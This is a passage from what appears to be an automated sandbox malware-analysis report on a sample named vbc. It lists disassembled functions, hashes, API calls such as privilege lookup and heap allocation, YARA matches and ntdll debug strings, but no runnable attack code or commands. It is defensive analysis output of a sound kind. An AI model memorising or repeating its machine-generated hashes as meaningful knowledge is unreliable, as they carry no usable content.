                                                                                                                                                  • Opcode Fuzzy Hash: 9986d349b0e22c89251a1f4f170a0e82e9e96e81927ff0b0fa95b01c7f552fbd
                                                                                                                                                  • Instruction Fuzzy Hash: 61900266211400030509B5580748507005687D6751395C421F1019650CDA2189615126
                                                                                                                                                  Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                                  • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                                                  • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                                  • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                                                  Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID: &EA
                                                                                                                                                  • API String ID: 1279760036-1330915590
                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                                                  Function 004082D3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 201 4082d3-4082e7 202 4082e9-4082fd call 41b710 201->202 203 40831e-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 201->203 214 40835c-40836e PostThreadMessageW 203->214 215 40838e-408392 203->215 216 408370-40838a call 40a470 214->216 217 40838d 214->217 216->217 217->215
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                                                  • Instruction ID: cccecc87c1ea1b2e49a02ea573b714a3824719a0686cf2f5ae3b0575679c9a49
                                                                                                                                                  • Opcode Fuzzy Hash: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                                                  • Instruction Fuzzy Hash: 1F1108B2940328ABDB11A6549C02FEE3358AB84B55F05016EFF44BB2C1DBBD6D0547F5
                                                                                                                                                  Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 220 408309-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 230 40835c-40836e PostThreadMessageW 220->230 231 40838e-408392 220->231 232 408370-40838a call 40a470 230->232 233 40838d 230->233 232->233 233->231
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                                                  • Instruction ID: da53683470e229f3deabd99abb76fcc4fe04895a6951e78cd3bde030695561bd
                                                                                                                                                  • Opcode Fuzzy Hash: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                                                  • Instruction Fuzzy Hash: 8D012871A80318BBE720A6908C43FFE772C5B41B44F04015EFF04BA1C2D6A8290543EA
                                                                                                                                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 236 408310-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 246 40835c-40836e PostThreadMessageW 236->246 247 40838e-408392 236->247 248 408370-40838a call 40a470 246->248 249 40838d 246->249 248->249 249->247
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                                  • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                                                  • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                                  • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                                                                                  Function 0041A782 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 276 41a782-41a7aa call 41af20 278 41a7af-41a7c4 LookupPrivilegeValueW 276->278
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                                                  • Instruction ID: ec21d61b55864976568eadb485c386ae057cc9e8f9e3017aea6482977b845cb1
                                                                                                                                                  • Opcode Fuzzy Hash: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                                                  • Instruction Fuzzy Hash: C9E06DB5600205ABD620DF69DC80EE737AE9F58254F128165FA0DEB241DA39E8518BB4
                                                                                                                                                  Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 282 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                                                                                  Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 285 41a790-41a7a9 286 41a7af-41a7c4 LookupPrivilegeValueW 285->286 287 41a7aa call 41af20 285->287 287->286
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                  Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                                                  Function 05C82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a33a1ff874c0f60062ad232198c744d3edb1f12d1410ea23a365fabe32a746fb
                                                                                                                                                  • Instruction ID: bf6bc76698db40be18cc2aba0f61c452f9845c23168d4ec137df5b29ca97d77d
                                                                                                                                                  • Opcode Fuzzy Hash: a33a1ff874c0f60062ad232198c744d3edb1f12d1410ea23a365fabe32a746fb
                                                                                                                                                  • Instruction Fuzzy Hash: F5B09B729015C5C5EE15F760460CB37791177D1705F55C461D2034745E4738C1D1E176

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 05CF8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • a NULL pointer, xrefs: 05CF8F90
                                                                                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05CF8DB5
                                                                                                                                                  • The instruction at %p referenced memory at %p., xrefs: 05CF8EE2
                                                                                                                                                  • write to, xrefs: 05CF8F56
                                                                                                                                                  • The instruction at %p tried to %s , xrefs: 05CF8F66
                                                                                                                                                  • The resource is owned shared by %d threads, xrefs: 05CF8E2E
                                                                                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05CF8FEF
                                                                                                                                                  • This failed because of error %Ix., xrefs: 05CF8EF6
                                                                                                                                                  • an invalid address, %p, xrefs: 05CF8F7F
                                                                                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 05CF8F3F
                                                                                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 05CF8E02
                                                                                                                                                  • read from, xrefs: 05CF8F5D, 05CF8F62
                                                                                                                                                  • *** then kb to get the faulting stack, xrefs: 05CF8FCC
                                                                                                                                                  • The critical section is owned by thread %p., xrefs: 05CF8E69
                                                                                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05CF8F34
                                                                                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 05CF8E4B
                                                                                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05CF8F26
                                                                                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05CF8DC4
                                                                                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05CF8E86
                                                                                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05CF8D8C
                                                                                                                                                  • *** enter .exr %p for the exception record, xrefs: 05CF8FA1
                                                                                                                                                  • <unknown>, xrefs: 05CF8D2E, 05CF8D81, 05CF8E00, 05CF8E49, 05CF8EC7, 05CF8F3E
                                                                                                                                                  • Go determine why that thread has not released the critical section., xrefs: 05CF8E75
                                                                                                                                                  • *** enter .cxr %p for the context, xrefs: 05CF8FBD
                                                                                                                                                  • The resource is owned exclusively by thread %p, xrefs: 05CF8E24
                                                                                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05CF8DD3
                                                                                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 05CF8DA3
                                                                                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05CF8F2D
                                                                                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05CF8E3F
                                                                                                                                                  • *** Inpage error in %ws:%s, xrefs: 05CF8EC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                  • API String ID: 0-108210295
                                                                                                                                                  • Opcode ID: 113f6b0062afafc0f7bba57ce8abf7b436b8bf79ee227aca7ad2bbf51e5c81a4
                                                                                                                                                  • Instruction ID: dce29cb5209d7a4481cad274dbaf80b279b5893437de40981e16e0078dcca8c5
                                                                                                                                                  • Opcode Fuzzy Hash: 113f6b0062afafc0f7bba57ce8abf7b436b8bf79ee227aca7ad2bbf51e5c81a4
                                                                                                                                                  • Instruction Fuzzy Hash: 3781E379B44214BFCB259B14CC8AD6B7F36EF4AB10F010C98F2096F212E3768601EB61
                                                                                                                                                  Function 05CC2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                  • Opcode ID: 09e39845ad5badf898f266b95d5bf0c3497af7d9a476cfd3f5da3fb321a65ccb
                                                                                                                                                  • Instruction ID: a168675a9ed98b03d16cef7076281967b4e84c897da702c180c04e5447c81d2a
                                                                                                                                                  • Opcode Fuzzy Hash: 09e39845ad5badf898f266b95d5bf0c3497af7d9a476cfd3f5da3fb321a65ccb
                                                                                                                                                  • Instruction Fuzzy Hash: 1492BA79608381AFD721CE24C884F6BBBE9BB84B54F044C6DFA95D7250D770E984CB92
                                                                                                                                                  Function 05C78620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 05CB54AE, 05CB54FA
                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CB54CE
                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 05CB54B6
                                                                                                                                                  • 8, xrefs: 05CB52E3
                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CB540A, 05CB5496, 05CB5519
                                                                                                                                                  • Thread identifier, xrefs: 05CB553A
                                                                                                                                                  • corrupted critical section, xrefs: 05CB54C2
                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CB54E2
                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 05CB5508
                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 05CB542B
                                                                                                                                                  • Critical section debug info address, xrefs: 05CB541F, 05CB552E
                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 05CB5543
                                                                                                                                                  • Critical section address, xrefs: 05CB5425, 05CB54BC, 05CB5534
                                                                                                                                                  • Critical section address., xrefs: 05CB5502
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                  • Opcode ID: bd1b062a4bfded6dc6c4012c8038bcb93e885befc21d7214a409599ce4298e1b
                                                                                                                                                  • Instruction ID: b9b0a604fd759521a6ff0bf358de9c75acf332c089049364162f311f4a801f21
                                                                                                                                                  • Opcode Fuzzy Hash: bd1b062a4bfded6dc6c4012c8038bcb93e885befc21d7214a409599ce4298e1b
                                                                                                                                                  • Instruction Fuzzy Hash: 99819DB1A40358AFEB20CF99C849FEEBBB5FB08714F104929F505B7640D3B5AA44DB50
                                                                                                                                                  Function 05C5AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                  • API String ID: 0-3197712848
                                                                                                                                                  • Opcode ID: 73753571c2e47069544f4d719c92aa0864d14aaf51cf2b8cad0983973b99934d
                                                                                                                                                  • Instruction ID: b061c8c4cfc07e821ee5a7627aedd0ba057f9dbac66ac3e7724105b92fa93c15
                                                                                                                                                  • Opcode Fuzzy Hash: 73753571c2e47069544f4d719c92aa0864d14aaf51cf2b8cad0983973b99934d
                                                                                                                                                  • Instruction Fuzzy Hash: DF12E4716083419BD324DF59C845BBABBE5FF84728F040E2AFD868B290E734DA84D756
                                                                                                                                                  Function 05CF0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                  • API String ID: 0-1357697941
                                                                                                                                                  • Opcode ID: 8b2db26db51b4270844dad0a535c16d1d9b097ac85a97b74f13a4d98ee83b15b
                                                                                                                                                  • Instruction ID: d32fe7055a732419c76312a9872a30ca33188f3e418d4ef8d38da317c84acf10
                                                                                                                                                  • Opcode Fuzzy Hash: 8b2db26db51b4270844dad0a535c16d1d9b097ac85a97b74f13a4d98ee83b15b
                                                                                                                                                  • Instruction Fuzzy Hash: 4CF10635604685EFCB65CF68C049BBAB7F5FF09B04F088C59E583AB242D734AA45DB50
                                                                                                                                                  Function 05CF0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                  • Opcode ID: 16b2badcd121175a60f3487ab5b07127a8e794bdb69ce76e98df316a9f49cfd2
                                                                                                                                                  • Instruction ID: 8d58928b877f18dc36a7e4b217b9a9cade2f6f90d0090656416ff03ab5c56bdf
                                                                                                                                                  • Opcode Fuzzy Hash: 16b2badcd121175a60f3487ab5b07127a8e794bdb69ce76e98df316a9f49cfd2
                                                                                                                                                  • Instruction Fuzzy Hash: C3D10F31614684EFCB51DF68C44AAADBBF2FF4AB04F088C59E946AB212D734DA40DB54
                                                                                                                                                  Function 05C4ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                                                                                  • API String ID: 0-664215390
                                                                                                                                                  • Opcode ID: 1795df682ffaff76084f94d2c0ec84a4dda06864567c0fd9fd3ea4442a975e05
                                                                                                                                                  • Instruction ID: 8b9659168f245f885223b57648ef3ad5f11b70b2398178f92abb0316273e3141
